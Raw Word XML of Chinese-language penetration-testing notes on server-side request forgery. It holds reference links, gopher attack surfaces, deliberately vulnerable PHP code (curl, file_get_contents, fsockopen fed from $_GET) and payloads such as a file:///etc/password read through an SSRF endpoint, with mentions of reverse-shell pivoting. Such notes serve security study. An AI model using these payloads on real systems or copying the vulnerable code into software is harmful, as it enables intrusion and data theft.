        <w:t>at \\ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC93515" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404"/>
    <w:p w14:paraId="5E064736" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
        <w:t>net share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E6C1A1" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404"/>
    <w:p w14:paraId="7C9EFD40" w14:textId="77777777" w:rsidR="00F91404" w:rsidRDefault="00F91404" w:rsidP="00F91404">
      <w:r>
        <w:t>services.msc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A667031" w14:textId="77777777" w:rsidR="00AD3AAE" w:rsidRDefault="00AD3AAE" w:rsidP="00F91404"/>
    <w:p w14:paraId="46EAF007" w14:textId="7EF8B36C" w:rsidR="00AD3AAE" w:rsidRPr="00DB5BB9" w:rsidRDefault="00AD3AAE" w:rsidP="00DB5BB9">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB5BB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB5BB9">
        <w:t>SRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26082DE6" w14:textId="0773E439" w:rsidR="00670246" w:rsidRDefault="006C7551" w:rsidP="00670246">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251694080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0407219F" wp14:editId="20A18C1B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3120390"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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FB325" w14:textId="61638E8D" w:rsidR="00670246" w:rsidRDefault="00BB3AB0" w:rsidP="00670246">
      <w:hyperlink r:id="rId176" w:history="1">
        <w:r w:rsidR="00670246" w:rsidRPr="00A12D06">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/-chenxs/p/11749367.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005B2B06">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（打redis）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C65B034" w14:textId="77777777" w:rsidR="00670246" w:rsidRPr="00670246" w:rsidRDefault="00670246" w:rsidP="00670246"/>
    <w:p w14:paraId="3E07097F" w14:textId="60C96E00" w:rsidR="00AD3AAE" w:rsidRDefault="00BB3AB0" w:rsidP="00F91404">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId177" w:history="1">
        <w:r w:rsidR="0039199F" w:rsidRPr="00EE2BF5">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://blog.dyboy.cn/websecurity/160.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="656CA7FE" w14:textId="7BE0D6B8" w:rsidR="00DB5BB9" w:rsidRDefault="00DB5BB9" w:rsidP="00F91404">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B9A4474" w14:textId="5F58E5FD" w:rsidR="00DB5BB9" w:rsidRDefault="00BB3AB0" w:rsidP="00F91404">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId178" w:history="1">
        <w:r w:rsidR="00D860D9" w:rsidRPr="008349A2">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://blog.chaitin.cn/gopher-attack-surfaces/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7ECF3A68" w14:textId="49F7E413" w:rsidR="00D860D9" w:rsidRDefault="00D860D9" w:rsidP="00F91404">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45F58FA8" w14:textId="04509572" w:rsidR="00D860D9" w:rsidRPr="00D860D9" w:rsidRDefault="00D860D9" w:rsidP="00F91404">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D860D9">
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>https://zhuanlan.zhihu.com/p/115222529</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25956D9D" w14:textId="5E252EFE" w:rsidR="00DB5BB9" w:rsidRDefault="00DB5BB9" w:rsidP="00F91404">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5388A3E5" w14:textId="058DCB98" w:rsidR="00D5070E" w:rsidRDefault="00BB3AB0" w:rsidP="00F91404">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId179" w:history="1">
        <w:r w:rsidR="00165CA1" w:rsidRPr="008349A2">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/flokz/p/ssrf.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6CA6C742" w14:textId="69C8FA17" w:rsidR="00165CA1" w:rsidRDefault="00165CA1" w:rsidP="00F91404">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165CA1">
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>https://www.freebuf.com/column/157466.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F71B198" w14:textId="47B70C7B" w:rsidR="00DB5BB9" w:rsidRDefault="00DB5BB9" w:rsidP="00F91404">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D887D6" w14:textId="77777777" w:rsidR="00D5070E" w:rsidRDefault="00D5070E" w:rsidP="00D5070E">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>通过【curl命令】和【gopher协议】伪造post请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546692B0" w14:textId="46A7923C" w:rsidR="00DB5BB9" w:rsidRPr="00D5070E" w:rsidRDefault="007F185D" w:rsidP="00F91404">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>换行</w:t>
      </w:r>
      <w:r>
        <w:t>%0D%0A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A66361C" w14:textId="0BADE496" w:rsidR="00DB5BB9" w:rsidRDefault="00BB3AB0" w:rsidP="005357F0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId180" w:history="1">
        <w:r w:rsidR="005357F0" w:rsidRPr="005357F0">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="000000" w:themeColor="text1"/>
          </w:rPr>
          <w:t>http://192.168.10.143/ssrf.php?url=http://192.168.0.116:80</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="292711A1" w14:textId="150BC28A" w:rsidR="005357F0" w:rsidRDefault="005357F0" w:rsidP="005357F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143站点存在ssrf，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F32E08D" w14:textId="07D1C8B5" w:rsidR="005357F0" w:rsidRDefault="005357F0" w:rsidP="005357F0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14260AA" wp14:editId="38B1608D">
            <wp:extent cx="5274310" cy="271589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862C" w14:textId="00359ABF" w:rsidR="005357F0" w:rsidRDefault="005357F0" w:rsidP="005357F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隔着跳板进行反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237E405E" w14:textId="3D782BB8" w:rsidR="005357F0" w:rsidRDefault="005357F0" w:rsidP="005357F0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46320457" w14:textId="09036153" w:rsidR="005357F0" w:rsidRDefault="005357F0" w:rsidP="005357F0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F812003" wp14:editId="5094DC82">
            <wp:extent cx="5274310" cy="6546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65F2" w14:textId="2D272524" w:rsidR="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="005357F0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31AB0ED1" w14:textId="77777777" w:rsidR="00473D7C" w:rsidRPr="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="00473D7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473D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>4 系统局限性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A642F56" w14:textId="77777777" w:rsidR="00473D7C" w:rsidRPr="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="00473D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3D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">经过测试发现 Gopher 的以下几点局限性： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4078ADB0" w14:textId="77777777" w:rsidR="00473D7C" w:rsidRPr="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="00473D7C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3D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>大部分 PHP 并不会开启 fopen 的 gopher wrapper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AC22A9" w14:textId="77777777" w:rsidR="00473D7C" w:rsidRPr="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="00473D7C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3D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>file_get_contents 的 gopher 协议不能 URLencode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BA928D" w14:textId="77777777" w:rsidR="00473D7C" w:rsidRPr="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="00473D7C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3D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>file_get_contents 关于 Gopher 的 302 跳转有 bug，导致利用失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E94E718" w14:textId="77777777" w:rsidR="00473D7C" w:rsidRPr="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="00473D7C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3D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PHP 的 curl 默认不 follow 302 跳转</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01723C38" w14:textId="77777777" w:rsidR="00473D7C" w:rsidRPr="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="00473D7C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3D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl/libcurl 7.43 上 gopher 协议存在 bug（%00 截断），经测试 7.49 可用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167CE22D" w14:textId="77777777" w:rsidR="00473D7C" w:rsidRPr="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="00473D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3D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>更多有待补充。</w:t>
      </w:r>
      <w:r w:rsidRPr="00473D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">另外，并不限于 PHP 的 SSRF。当存在 XXE、ffmepg SSRF 等漏洞的时候，也可以进行利用。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFD83CE" w14:textId="77777777" w:rsidR="00473D7C" w:rsidRPr="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="00473D7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0" w:name="h5_更多攻击面"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00473D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>5 更多攻击面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB668AA" w14:textId="77777777" w:rsidR="00473D7C" w:rsidRPr="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="00473D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3D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">基于 TCP Stream 且不做交互的点都可以进行攻击利用，包括但不限于： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDA166E" w14:textId="77777777" w:rsidR="00473D7C" w:rsidRPr="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="00473D7C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3D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>HTTP GET/POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9B372D" w14:textId="77777777" w:rsidR="00473D7C" w:rsidRPr="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="00473D7C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3D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A0A28C" w14:textId="77777777" w:rsidR="00473D7C" w:rsidRPr="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="00473D7C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3D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Memcache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3288AF99" w14:textId="77777777" w:rsidR="00473D7C" w:rsidRPr="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="00473D7C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3D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C55926" w14:textId="77777777" w:rsidR="00473D7C" w:rsidRPr="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="00473D7C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3D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF9D51A" w14:textId="77777777" w:rsidR="00473D7C" w:rsidRPr="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="00473D7C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3D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>基于一个 TCP 包的 exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24713F88" w14:textId="77777777" w:rsidR="00473D7C" w:rsidRPr="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="00473D7C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3D7C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP（不能实现上传下载文件，但是在有回显的情况下可用于爆破内网 FTP） </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C8B456" w14:textId="77777777" w:rsidR="00473D7C" w:rsidRPr="00473D7C" w:rsidRDefault="00473D7C" w:rsidP="005357F0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F041585" w14:textId="5713B9F7" w:rsidR="0039199F" w:rsidRDefault="001C5082" w:rsidP="00DB5BB9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB5BB9">
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssrf漏洞代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD21FFC" w14:textId="16C9D427" w:rsidR="00A54D5E" w:rsidRDefault="00A54D5E" w:rsidP="00F91404">
      <w:r>
        <w:t>curl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BFB604" w14:textId="77777777" w:rsidR="001C5082" w:rsidRPr="001C5082" w:rsidRDefault="001C5082" w:rsidP="001C50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5082">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">function curl($url){  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B6866E" w14:textId="77777777" w:rsidR="001C5082" w:rsidRPr="001C5082" w:rsidRDefault="001C5082" w:rsidP="001C50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5082">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    $ch = curl_init();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164FEEAC" w14:textId="77777777" w:rsidR="001C5082" w:rsidRPr="001C5082" w:rsidRDefault="001C5082" w:rsidP="001C50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5082">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    curl_setopt($ch, CURLOPT_URL, $url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1384059E" w14:textId="77777777" w:rsidR="001C5082" w:rsidRPr="001C5082" w:rsidRDefault="001C5082" w:rsidP="001C50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5082">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    curl_setopt($ch, CURLOPT_HEADER, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD83CAA" w14:textId="77777777" w:rsidR="001C5082" w:rsidRPr="001C5082" w:rsidRDefault="001C5082" w:rsidP="001C50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5082">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    curl_exec($ch);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649C1D6C" w14:textId="77777777" w:rsidR="001C5082" w:rsidRPr="001C5082" w:rsidRDefault="001C5082" w:rsidP="001C50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5082">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    curl_close($ch);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EA522D" w14:textId="6A5C2C60" w:rsidR="001C5082" w:rsidRPr="001C5082" w:rsidRDefault="001C5082" w:rsidP="001C50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508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D5F4BB6" w14:textId="77777777" w:rsidR="001C5082" w:rsidRPr="001C5082" w:rsidRDefault="001C5082" w:rsidP="001C50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5082">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$url = $_GET['url'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE843E8" w14:textId="77777777" w:rsidR="001C5082" w:rsidRPr="001C5082" w:rsidRDefault="001C5082" w:rsidP="001C50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5082">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">curl($url); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344F3757" w14:textId="06812EE9" w:rsidR="001C5082" w:rsidRDefault="001C5082" w:rsidP="00F91404"/>
    <w:p w14:paraId="24F14CB4" w14:textId="601BF15D" w:rsidR="001C5082" w:rsidRDefault="00A54D5E" w:rsidP="00F91404">
      <w:r>
        <w:t xml:space="preserve">file_get_contents </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>造成的漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24128222" w14:textId="751723A5" w:rsidR="00A54D5E" w:rsidRDefault="00A54D5E" w:rsidP="00F91404"/>
    <w:p w14:paraId="79B78E23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>$url = $_GET['url'];;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D4D36C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>echo file_get_contents($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBF8FB5" w14:textId="77777777" w:rsidR="00A54D5E" w:rsidRPr="00A54D5E" w:rsidRDefault="00A54D5E" w:rsidP="00A54D5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>fsockopen造成的SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BF7438" w14:textId="77777777" w:rsidR="00A54D5E" w:rsidRPr="001C5082" w:rsidRDefault="00A54D5E" w:rsidP="00F91404"/>
    <w:p w14:paraId="59982A22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function GetFile($host,$port,$link) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9552C3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{ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2494D8B6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$fp = fsockopen($host, intval($port), $errno, $errstr, 30); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4A77BC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if (!$fp) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE05B4A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{ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361AE041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    echo "$errstr (error number $errno) \n"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4019E432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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C54300D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else </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C42D0E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{ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75012CC0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    $out = "GET $link HTTP/1.1\r\n"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491ECA92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    $out .= "Host: $host\r\n"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4E1097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    $out .= "Connection: Close\r\n\r\n"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DF4A9E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$out .= "\r\n"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3E8076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    fwrite($fp, $out); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD332D1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    $contents=''; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005150D3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    while (!feof($fp)) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A965A69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    { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05174AFC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        $contents.= fgets($fp, 1024); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A4696E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    } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636D9087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    fclose($fp); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4E76A3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    return $contents; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462A4520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 xml:space="preserve">    } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAAA47B" w14:textId="77777777" w:rsidR="00A54D5E" w:rsidRPr="00A54D5E" w:rsidRDefault="00A54D5E" w:rsidP="00A54D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D5E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FE4D701" w14:textId="77777777" w:rsidR="00DB5BB9" w:rsidRPr="00DB5BB9" w:rsidRDefault="00DB5BB9" w:rsidP="00DB5B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BB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl -v http://xx.com/ssrf.php?url=sxxx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491911C3" w14:textId="77777777" w:rsidR="00DB5BB9" w:rsidRPr="00DB5BB9" w:rsidRDefault="00DB5BB9" w:rsidP="00DB5B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BB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>file://</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CB52DC" w14:textId="77777777" w:rsidR="00DB5BB9" w:rsidRPr="00DB5BB9" w:rsidRDefault="00DB5BB9" w:rsidP="00DB5B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BB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssrf.php?url=file:///etc/password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5036A6C6" w14:textId="77777777" w:rsidR="00DB5BB9" w:rsidRPr="00DB5BB9" w:rsidRDefault="00DB5BB9" w:rsidP="00DB5B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BB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dict://</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA8E680" w14:textId="77777777" w:rsidR="00DB5BB9" w:rsidRPr="00DB5BB9" w:rsidRDefault="00DB5BB9" w:rsidP="00DB5B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BB9">
        <w:rPr>
